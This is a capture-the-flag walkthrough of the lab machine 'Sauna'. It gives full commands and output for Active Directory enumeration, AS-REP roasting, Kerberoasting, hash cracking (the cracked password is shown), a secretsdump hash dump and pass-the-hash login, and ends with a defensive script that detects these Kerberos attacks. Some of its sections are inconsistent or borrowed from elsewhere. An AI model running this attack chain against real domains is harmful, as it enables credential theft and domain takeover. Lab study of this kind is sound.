***System IP : 10.10.10.175***

### Summary

**1- Overview**
**2- Enumeration**
2.1- Nmap Scan
2.2- Web Site Discovery
2.3- Active Directory Enumeration
**3- Privilege Escalation**
3.1- Post-Compromise Enumeration
3.2- New Account Enumeration
3.3- Post-Compromise Exploitation

## 1- Overview

## 2- Enumeration

### 2.1- Service Enumeration

**Using nmapAutomator for scanning:**

```bash
/mnt/nmapAutomator/nmapAutomator.sh -o ./ -t all 10.10.10.175
```

**Using rustscan for scanning:**

```bash
rustscan -a 10.10.10.175 -u 5000 -- -A
```

**The results are as follows:**

```
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain?       syn-ack ttl 127
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-01-16 18:08:19Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127
3269/tcp open  tcpwrapped    syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=1/16%OT=53%CT=%CU=%PV=Y%DS=11%DC=T%G=N%TM=61E3F98E%P=x86_64-pc-linux-gnu)
OPS(O1=M54BNW8NNS%O2=M54BNW8NNS%O3=M54BNW8%O4=M54BNW8NNS%O5=M54BNW8NNS%O6=M54BNNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M54BNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
```

### 2.2- Website Enumeration

```bash
python3 dirsearch.py -u http://10.10.10.175/ -e php,txt -w /usr/share/SecLists/Discovery/Web-Content/big.txt
```

![[Pasted image 20220116191512.png]]

Nothing useful was found, but from the website we can collect some people's names. We also ran CeWL against the site to build a user list, but that found nothing either.
![[Pasted image 20220116185519.png]]

```
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb
```

### 2.3- Active Directory Enumeration

**Search for some LDAP information**

Let's begin by using ldapsearch to grab general information:

```bash
ldapsearch -x -s base namingcontexts -h 10.10.10.175
```

The results:

```text
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#

#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```

We now know the DC's domain is EGOTISTICAL-BANK.LOCAL; add it to /etc/hosts.

Let's try to find more information about users if we can. The first thing to try is the **enumdomusers** command in rpcclient. We have to attempt a null session, and nothing in our nmap scan suggests that it will work.

Indeed, access is denied. If we try enum4linux, we don't find more information about users either, and crackmapexec does not give a better result.
Another idea is to try [Impacket](https://github.com/SecureAuthCorp/impacket)'s GetADUsers.py against the users, but that doesn't find anything more either. Still, I guess there must be some domain usernames, because when I run

![[Pasted image 20220116185926.png]]

```bash
ldapsearch -x -D '' -w '' -b "DC=EGOTISTICAL-BANK,DC=LOCAL" -h 10.10.10.175
```

the results are:

```text
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ldapsearch
#

# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL

# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL

# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL

# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL

# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL

# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL

# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL

# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL

# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL

# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL

# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL

# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL

# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL

# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

# search reference
ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search reference
ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search reference
ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 19
# numEntries: 15
# numReferences: 3
```

Then I used a vi macro to create a user list like this:

![[Pasted image 20220116190205.png]]

```
Fergus Smith
Fergus.Smith
FSmith
F_Smith
F_Smith
Shaun Coins
Shaun.Coins
SCoins
S_Coins
S_Coins
Hugo Bear
Hugo.Bear
HBear
H_Bear
H_Bear
Bowie Taylor
Bowie.Taylor
BTaylor
B_Taylor
B_Taylor
Sophie Driver
Sophie.Driver
SDriver
S_Driver
S_Driver
Steven Kerb
Steven.Kerb
SKerb
S_Kerb
S_Kerb
```

```bash
/opt/Active_domain/kerbrute userenum -d EGOTISTICAL-BANK.LOCAL user --dc 10.10.10.175
```

![[Pasted image 20220116190453.png]]

I found a username, Fsmith, and also the user sauna. Let's try AS-REP roasting:

```bash
impacket-GetNPUsers -no-pass -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile user -format hashcat
```

Results:

```
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] User sauna doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:9bcbea17ca46713ba35bc234c4401ed2$...
```

![[Pasted image 20220116190613.png]]

Crack it with hashcat mode 18200:

```bash
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
```

Fsmith : Thestrokes23

![[Pasted image 20220116190651.png]]

Test impacket-secretsdump and impacket-GetUserSPNs:

```bash
impacket-GetUserSPNs EGOTISTICAL-BANK.LOCAL/Fsmith:Thestrokes23 -request -dc-ip 10.10.10.175
```

![[Pasted image 20220116190816.png]]

It looks like it's running, but we get an error:

```
[-] Principal: EGOTISTICAL-BANK.LOCAL\HSmith - Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
```

We can run `ntpdate 10.10.10.175` to sync our clock with the DC and run it again.

![[Pasted image 20220116190918.png]]

OK, that's running now, and we get the HSmith hash.
```
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$dfdaf04b9c9f05bae305be7e23c82420$...
```

Crack it with john:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

![[Pasted image 20220116191102.png]]

Hsmith : Thestrokes23, oh, that's the same password.

Now we try to secretsdump the DC hashes, and it fails:

```bash
impacket-secretsdump EGOTISTICAL-BANK.LOCAL/[email protected]
```

```bash
crackmapexec winrm 10.10.10.175 -u user -p pass --continue-on-success
smbmap -H 10.10.10.175 -u Hsmith -p Thestrokes23
smbmap -H 10.10.10.175 -u Fsmith -p Thestrokes23
```

![[Pasted image 20220116192159.png]]

Use evil-winrm to log in:

```bash
evil-winrm -i sauna.htb -u 'Fsmith' -p Thestrokes23
```

![[Pasted image 20220116192322.png]]

Run BloodHound to collect information about the AD machine:

```bash
python3 /opt/Active_domain/bloodhound/BloodHound.py/bloodhound.py -u Fsmith -p Thestrokes23 -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c all
```

We can see this edge: a WriteDacl right towards administrator.

![[Pasted image 20220116192950.png]]

### Getting Root

Having gained access to the machine, we begin local enumeration using [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS). Looking at the results, we see that credentials for `svc_loanmanager` are stored in the `HKLM\Software\Microsoft\Windows_NT\Currentversion\WinLogon` registry key.

![](https://i0.wp.com/KhaoticDev.net/wp-content/uploads/2020/04/winpeas.png?resize=738%2C80&ssl=1)

Got a password for svc_loanmanager.

Using Impacket's **secretsdump.py** with these new credentials, we are able to dump the domain password hashes.
```bash
$ secretsdump.py 'EGOTISTICAL-BANK/svc_loanmgr:[email protected]'
```

![](https://i1.wp.com/KhaoticDev.net/wp-content/uploads/2020/04/secretsdump-1.png?fit=1024%2C197&ssl=1)

Dumping AD hashes.

Using the hash for `administrator`, we can use **evil-winrm** to log into the machine and retrieve `root.txt`:

```bash
evil-winrm.rb -i 10.10.10.175 -u administrator -H passwordhash
```

![[Pasted image 20220507164950.png]]

## 3- Privilege Escalation

### 3.1- Post-Compromise Enumeration

Information gathering with `whoami /all`, peas.exe, and similar tools is the useful thing here.
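From the defender's side, the two ticket requests that produced the hashes above (the AS-REP for Fsmith and the RC4 service ticket for HSmith's SPN) leave distinct traces in the domain controller's Security log. The following is an added example, not part of the original writeup: it assumes events 4768/4769 have already been parsed into dicts keyed by the EventData field names Windows uses, and the sample events, IP addresses and `SAUNA$` machine account are constructed.

```python
"""Flag AS-REP roasting and Kerberoasting in Windows Security events 4768/4769."""
from collections import Counter

RC4_HMAC = "0x17"   # etype 23, the source of $krb5asrep$23$ / $krb5tgs$23$ hash material
KRB_OK = "0x0"      # Status for a successful ticket request

# Constructed sample events modelled on the writeup's two requests (not real logs).
EVENTS = [
    # Normal: AES TGT with PA-ENC-TIMESTAMP pre-authentication (PreAuthType 2)
    {"EventID": 4768, "TargetUserName": "hsmith", "ServiceName": "krbtgt", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": KRB_OK, "IpAddress": "10.10.10.50"},
    # AS-REP roast: account without pre-auth handed out an RC4-encrypted AS-REP
    {"EventID": 4768, "TargetUserName": "fsmith", "ServiceName": "krbtgt", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": KRB_OK, "IpAddress": "10.10.14.5"},
    # Kerberoast: RC4 service ticket for a user account that carries an SPN
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL", "ServiceName": "HSmith",
     "TicketEncryptionType": "0x17", "Status": KRB_OK, "IpAddress": "10.10.14.5"},
    # Benign: AES service ticket for a machine account
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL", "ServiceName": "SAUNA$",
     "TicketEncryptionType": "0x12", "Status": KRB_OK, "IpAddress": "10.10.14.5"},
]


def asrep_roastable_accounts(events):
    """4768 with PreAuthType 0: the account has DONT_REQ_PREAUTH set (clear the flag, not just the alert)."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["PreAuthType"] == "0" and e["Status"] == KRB_OK})


def kerberoast_requests(events):
    """4769 RC4 tickets for non-machine, non-krbtgt services, as (requester, service) pairs."""
    hits = []
    for e in events:
        svc = e["ServiceName"]
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC and e["Status"] == KRB_OK
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            hits.append((e["TargetUserName"], svc))
    return hits


def rc4_requests_by_source(events):
    """Count RC4 ticket activity per source IP; a burst from one host is the roasting signature."""
    return Counter(e["IpAddress"] for e in events
                   if e["EventID"] in (4768, 4769) and e["TicketEncryptionType"] == RC4_HMAC)
```

Accounts returned by `asrep_roastable_accounts` should have pre-authentication re-enabled, and user accounts that show up in `kerberoast_requests` should get long random passwords or be moved to AES-only via msDS-SupportedEncryptionTypes.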